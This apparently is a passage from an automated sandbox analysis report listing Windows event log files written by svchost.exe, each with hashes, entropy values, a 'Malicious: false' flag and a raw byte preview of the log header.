Preview:	ElfChnk.x...............x....................0..`2..........................................................................xP.................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................9)..................................................**..`...x.......Q.............{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66960
Entropy (8bit):	4.218550472968928
Encrypted:	false
SSDEEP:	384:f+4VnVVfh8fVyKVNPVV6CVT3Vp0VNxVtOVNTVwahVv9VmXVo/VumVYLVK8VVpVbf:fZcfE080p82C
MD5:	B8533297E2E964C2CF691137C7D8BA1E
SHA1:	8E5616B106576CB600A7AB0DB1A87FFA7CEFE69B
SHA-256:	CD67B00DF707E2293BA77EA78914C926B06FA5C6D6D93469C2C38C214275292A
SHA-512:	58A816AF91775E29EE4F104ECC02FB4120ECD71C6BB4C4F732EF3DF3CD7E24CE444BC686BAE006648C0BA347742FB32645651158C0C0135B9E85EE21D375790D
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk..-.......-.......-.......-..........0........q.B........................................................................................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F..........................................................................................................................................................-..........W..........{Y.&...............................................................@.......X...a.!.....E..........@....W...C.."......"............-...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y...................-..........W..........{

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	4.49887204986715
Encrypted:	false
SSDEEP:	384:fhuoS9VoryorOoroortorVorVorNorrmo4orNRoPNorGoryoIAcolL3oJ7oQjoby:fsWflkzHVhsWflkzHV
MD5:	6515BA0DE292719FFBFB0DAC79502B26
SHA1:	A63FB897EE0B0438566AE122E591FAF2DADD3CD4
SHA-256:	FB0FAA8F49E025874FA598F64630495417E542C40CD6BBA08356BA0CCF0E2388
SHA-512:	9F25466788C30B656CA42E8BA1A337186B6C2CB78AAC58AB822359C091E92ECA086825562CF273F76D752A9E3C78E64CA015DF7A3E2DEB9CAB0518BE7995BBF2
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.........b...............b....................n.......................................................................Ws9................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F................................................................&...................................!..............}...............................**................@.S...........w.&.........w..._.\|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.080997150443083
Encrypted:	false
SSDEEP:	768:PqyEuJerqVdWqfSGwMblcavHCmu2CeXlWg:PE2er2xSGwMlcaviWVXll
MD5:	7059DD99BE646AB9B35F7F3970A5628D
SHA1:	B4006841E5A1EEB5BDA79B12E5F482A500793E52
SHA-256:	5DD63ECCADE1A007F0905A3F1754E3FABF2031DEFD90D485230649557C48D12C
SHA-512:	043DCCBD13E69A847FDB1B81E8D67783FFA57899EA7FCE8D4C52D88ECDB0297D25698C7D738C4EC165D85FBE61CC93BFCDC965B0735CAF77C819E9BCB32A66FC
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.........(...............(...........PH...I....TU....................................................................3...................d...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&....................................................................................................;......................**..............Y_:#T...........w.&.........w..._.\|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.094860420471812
Encrypted:	false
SSDEEP:	768:tdFO29ni/it1gsoz1JWObKNKTF0fjUVcRMsHeO5xneFYrj0wYF8OEU3mZMv5BAQW:E2a4wE4zR+d
MD5:	08DFEB917A3172F6BD860322D099F6FB
SHA1:	58C3AD6E92BBA8C8F163BEFD4BDD42AEB09E151B
SHA-256:	5F75CE7D48E70E034060E8541BFCE50E938EDA5AB0CA2C31BD1E6C03E6EC96E8
SHA-512:	29D612AED143C2209CB3F364EEC8C7332D0E50CA76A8FB8D854D2961903EC69323D33DDF64BA924A70414645BA38A71234EF6CC3608A687720DB103AC67C958E
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.........................................x!..........................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................g...................................&.......................**...............8.l$..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	98648
Entropy (8bit):	3.2945400348665483
Encrypted:	false
SSDEEP:	768:lxGxaXjUc+l9g8EUalFUr7XkelW3nvPdly7WDmu0lbuyuq0lP6+xwEe0+N/To5YG:RZZ7x8ZZ7xA
MD5:	76A992E05C417E4CB8AF57FB336A6AA8
SHA1:	D533F4C96E44B896D102A7DCC9C2A4F275A25416
SHA-256:	4BE0905E9E19B4F0E7D900D4329D8D8DA8EFD92528813756E9377D4256E0648B
SHA-512:	ACAA0115BD9BBF58922AAF85C82C723DC0647B945E260C986774F4E26C0FC5A888695366EC8F40D4F497D83F998BADEA1C1DFA97A91C7D0804BA39D663D69EEA
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.\|...............\|....................{..h}..:.).....................................................................o..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................&.......................**......\|.....................{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	5.695111276420338
Encrypted:	false
SSDEEP:	384:khFa58wH2KpzyzIzOa5o2H2KpzyzIzHa5azuzNz0zxzuewKWMKja544a5azuzNz+:k/VH1s6WdTN
MD5:	8D8BBFE3B12F6A85D2CD48BA2B839DCE
SHA1:	E4A523CC7B0B54F3BA0171E0179A70913532C37A
SHA-256:	0B394D6903D1E14C17F4322BA153709BCC59AA90F1D571599A14D2C53FC87EE0
SHA-512:	7455085AD3EF8AA0F81D4966B0189D91B5D4570F5654D72CBA2D246CE880D144DC06F28E1A86FA91F2726A8CFCF9A4A78B27632C71F44B37E20AF7BFA617B3BE
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.C.......[.......C.......[...............p......n.....................................................................)..........................................8...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................&...........93..........**......C.......dM.(#..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76320
Entropy (8bit):	4.404305072391989
Encrypted:	false
SSDEEP:	768:krpTPi9TM2bw8QagXkiCvdgRACd40B7pT6:0Li9TMAw8QZXRCvdKY0a
MD5:	2E6FE41A2A191519F86A8432E0D87C35
SHA1:	929ABAF6745F178DF17CEB173BD3FD58B7D28E8D
SHA-256:	1E503116A530827E304AD271B53B1D838AACE2F62CC1EEF1FDCAEDAC03328E59
SHA-512:	18298C227FFA35F03A729C66C2D4E2F45D1A4D074881A417372B16C2C54FB0D51B0E47CF32D825B8AD5DF4BF49CF8AA5F121D4E493087E606D516069B0F0A731
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.................s.......x...........0........$u......................................................................O..................0...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..`...s..........W..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.979080975877929
Encrypted:	false
SSDEEP:	768:1RsVrujhzfmf8DXi1wgEigjxfyByfFTbnQjCT:cr2fmf719E
MD5:	9D77D07081EEBFA5232F271A967AA0BA
SHA1:	F6CC0506EBD497881A49299935F888A806D478B8
SHA-256:	C68717894DACDF86C18715A1370E42AB77B88C58ED24E2CA298274DD2C48D0B3
SHA-512:	F4BE2DEF306EE2C383E3A957C5427D190FCBB8ACAFC68E95C04A678AA93625FB15862352698AC4436DBC9D8B8C485D9E66C547F758645A6E3A1138C44A9AA9D9
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.. ....... ....... ....... ...........-.../.....L....................................................................^54.................^...........................=...........................................................................................................................f...............?...........................m...................M...F.........................................../#......................................................................7.......&.......................**....... ......^\|.l$..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.240004525136968
Encrypted:	false
SSDEEP:	384:ghuvnvmvJvBvdvrvwvSvovl+v4v6vvvmvcMvOyv4vCvQpv9gsvTSvhvuvXvKt9vF:gNzX/gbt/H3lWmnLJy2
MD5:	053AEE0BFA166B99B86C16052BA61F87
SHA1:	6F6BB32D3B73D540148A19BBE9F4E8B7A55CDFB6
SHA-256:	99D608084E66517191578BBC5680B36DD29BE43EC7C3DCD6F1CE7483A49D20CD
SHA-512:	B2E2BCFD4C1FB4E22A783051A5CDD8F6073D8AF89FF1A2D2560EE1FB026400DB725CC4060F415E5F1A58A2C41C5D78FA2081FA9FB4074351AA6336870951CBD1
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.........^...............^..................<..x......................................................................L.................v...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................f ..........................................................&)......................**..............l..-T...........w.&.........w..._.\|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 55, DIRTY
Category:	modified
Size (bytes):	1052672
Entropy (8bit):	0.5660138186433984
Encrypted:	false
SSDEEP:	768:73MEYS9jvhCeqi4XdxxbXmNcD2fGbaBxXb3YYXUeLIU1smJYkO9HeWHlBxln2vlF:TMEYw5NH
MD5:	22A3562D75C0086E31CBF024EA704BD0
SHA1:	94C202AC7DCC266FCFD6F83FAE63AF2DA388A497
SHA-256:	14F317BB9E2190805E9B87EFF91B8E1195550BAD7A984827F11D2E879FFB7AC1
SHA-512:	7032281EB433CC3D6770D8F5F6C47B2DB2C32ED3193114189AA3ADB3203D418FFFDDFA4BCB8ECCB6B88BAEF26E1C3A571D6F1284153FD1D6D1A2644C8F846A77
Malicious:	false
Reputation:	unknown
Preview:	ElfFile.................7...................................................................................................u.Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.317994746558986
Encrypted:	false
SSDEEP:	384:+hX2k2TX2ZsCixCVCQCU2sT28h2b2b2p212/2V2b2S2BCACECJCe2a2F2MA2p22H:+f58V6Oqx8JA/cqS1Ll
MD5:	A4223CE544EB95B2DCEE178FBD8FD78E
SHA1:	4AA71B07814285E13E0868C646D29D64A71BA254
SHA-256:	7BD4A8C27A63A2E5C31CC1C53B06DDF38F0AEB873F50AB7487FF0618CAB86D4F
SHA-512:	FB6CFC8603C6735D00A6916FF1F0144AA023D35699D5144F8127C993D0E4AD578FA60BB8F05F93C148018FEE9539E0505728D817DDCCEEA156DF2E860723A66C
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.s...............s...................`.......M.......................................................................E ..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................IH...............................................................................................4......................**......s..........i..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.3588910510411125
Encrypted:	false
SSDEEP:	1536:G2+fFhoPP62zZ9RmAZNWojO/OTreg8qsLzXEOTLe1I2AvmaBp5VlCawbn2DkbwyR:GJfToH6oZ7msNfjUO3eBqqz0OPei2emP
MD5:	80E24626B6292FD7151D4DF349D1B0C5
SHA1:	4F4ADCBDE40B9E5036016CC0D937BF4901BA7EA1
SHA-256:	DCB3B7FAF6B4AFCB0C03F7E0F38C60C86D806C4B5DE3CDC47FDD29BB6811397F
SHA-512:	22E4318D34F73F1C7AD333DF451C0F7ED14FB402F6F69DEE59DB8D5532AD1A175F40E221EAEF0C6A44D601E44E9DB82D086C24BDA70D51D2ECB1D9C763518EAC
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk........~..............~....................68.....................................................................Jt.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................&.......................*.............".}B...........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.452839496763712
Encrypted:	false
SSDEEP:	1536:BM8VCAwXxyoKPCZ5vqb+k+IlXERQDr9MYL2J/ZUDrEuZlf3YiBJbh+C/JByBr8Er:BM8VnwXxyoKPCZ5vqb+k+IlXERQDr9M/
MD5:	B9A3BDD59625065EE1D0326E78F5D1F1
SHA1:	37A70119577B640B557FDDCA5AACDEF2A6A14E47
SHA-256:	C71BEB278D0D745E60193BB7A4871DD8D92ECA67543342BB55BE9171A8FCC09C
SHA-512:	B59AE5D4D6277802BCD3D2605CF0C19BAF7C36993C771F542BEC3EAC629BA79F1295EADF8F94BE8336E3EB1C6458BEF92E2988E3B652EE19BB86B6A7806073B1
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.^"......g"......^"......g"....................lZ......................................................................................0...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..`...^"......\|}..W..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	140760
Entropy (8bit):	4.74630194204064
Encrypted:	false
SSDEEP:	768:HjJ95bO9lyedoI/TYAjryxGdJNDjJ95bO9lyedoI/TYAjryxGdJNHCUp:fBGhTBGhV
MD5:	8D7DCDE6285555183A2A0857A18E9473
SHA1:	1523A37E93BC2D733D53FDE0D7724C8308B26F2D
SHA-256:	FEA493F76D13C11E886BE15C38809E5D5B4702E4CFC4F516F8E675C74DDE9158
SHA-512:	C6853EE0B17E423FEE1E74A9B2CD160EAE8B52DAD59692A0C02441746963795D9106A5B82B323FFFA8C2571A983A85A3E7D380C2D760ACCE3AB5AF6EC6E4DA44
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.iV.......V......iV.......V...........................................................................................\<.........................................D...=...........................................................................................................................f...............?...........................m...................M...F...............................M0...........................y.......................................}......................&.......................**......iV......9/.&$..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.5006748241629104
Encrypted:	false
SSDEEP:	384:SjhSiFQke1kNkqkvokekckFko8dk1kHkskAkTgkXkbkSGkJRk36k0s3kHEnpddpu:MbQmc+s
MD5:	78F2E3D5DB435AB0A5E1CDBA5F4A84F4
SHA1:	677C015C65E8C529037B8189AC877A19763B6EF7
SHA-256:	10D945D51E045B212DC5E26E70E1D21503C9D8D3CE4E4D264A2C3C99E9D2C11B
SHA-512:	41A605E36AF5C35D0CD905886F06974A7E19AF4C37B9BA996DED3BB295BA085CD7A0FBECBC23B847CB82A4CED3714A35CABFE8503B906B219BA7782713E49B6A
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.......................................................................................................................`................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................&.......................**...............[.]%..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.0819948809527125
Encrypted:	false
SSDEEP:	1536:PKTKQKFKEKIK9KWKbKSKmKjKYKwKfKgKhKV+K/KbKUKAKbKEKwKAK0KOKDKSKqKK:PKTKQKFKEKIK9KWKbKSKmKjKYKwKfKgi
MD5:	C00F0684FB556A3B11A3931B206DDEB7
SHA1:	AEAB7B77960F67D15108514EFE4D320FB7D97187
SHA-256:	31CC9DB8ACFF9CC72EC13F3C68AC0C1F3901E0C6370466BCF9F08D2E7359748C
SHA-512:	1ED96E30EA4FFAC356D8C2B22F2F0687F164149D3C8FC51B9BAF9C4CF252F49A89B9EA8E61F69A51003FFD02191D6550033E1E67C5325598AAFA47AC75DC6E30
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.........................................X...b..........................................................................................:...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................6...................................................................................**..............E6v(T...........w.&.........w..._.\|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	85432
Entropy (8bit):	4.2206486703289
Encrypted:	false
SSDEEP:	384:/Rgh9R+URWR8RhRPRDFRHhRxRXRlVRVRmRLReRifyyngRLfyjRSfymRCRsyRsRxm:OHQBnMDhjYHn
MD5:	4C5D1622D95EF8C89A602D74925FF986
SHA1:	2DBCDBE7BC71215903E3F724DC70EAD2F1F85A56
SHA-256:	AB8A0E9EFDC77720FBFCFF673F5B86C9214C47B374BC126651DB8F7E695FA227
SHA-512:	3316C6B8A50AABA895CBE1664B4EEE8A69717CC9D50B3E2EABA87434961504EBD11E132007E05B73E74E9D29F2F500AACA08503362DFD14652D4B12610359B2B
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.........%...............%............3...5...........................................................................[..............................................=...................................................................%...........................................'$.......#..f...Z........$..?...............................i$......?.......M...F....#..........}...............................&...."......................................................(.......................................*......%........W..........rs&...............................................................<.......T.....!................@.W...9^.u..TC....w.......h...%....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......."......$...............R...S.c.h.e.d.u.l.e.d.T.a.s.k.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e.......%.S.Y.S.T.E.M.R.O.O.T.%.\.S.y.s.t.e.m.3.2

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.310567316592127
Encrypted:	false
SSDEEP:	384:JhiBwB0BwBR8bBm7OBwBS4BwB/+BwBqUn8BwBcBwBsGUiBwBUPojBwBqhBPYhsBc:JJ8bUdjYqKxMSKNEKWtmp4msr
MD5:	CBE9946661FC570A35E03A287A348B77
SHA1:	345476AFB20E45CEDB481F520C02F615B7A6BC76
SHA-256:	F1B151FA5EF545C96C010E1056DE6B3EC0DB7C063E234C798EE039942C8FD988
SHA-512:	8328ED33EBF3213703B729022D2D1E02587C93583D1C799D8DD70FCB250B009596B8F2A21DC14AA40EE1E7F62FB7161AA9CCB19D2B9432EB99DA54D3F829BE66
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk..................................... C..PF..6........................................................................+..............................................=...........................................................................................................................f...............?...........................m...................M...F...................W.......................................................................................................&.......................**.. .............."..........{Y.&........{Y..JgV.@..y...........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WindowsSystemAssessmentTool%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.197264309835545
Encrypted:	false
SSDEEP:	384:chpY+YdAYkf2YbYoY2YxYaY7YlYgYBYBTYGYSOXY1YHYFY8NYfYOpYDYoY9YK/9Y:c4wQ45/1obSO8nVy
MD5:	212FBE0E87DBAF827519FBE731A52823
SHA1:	24D241281BA5E7CFF41F8D6A72BB606A7FFCCD9A
SHA-256:	36F437B9C107F422E965A26B338A9088C53E4A6352962D1C00EEE5D9234D97C7
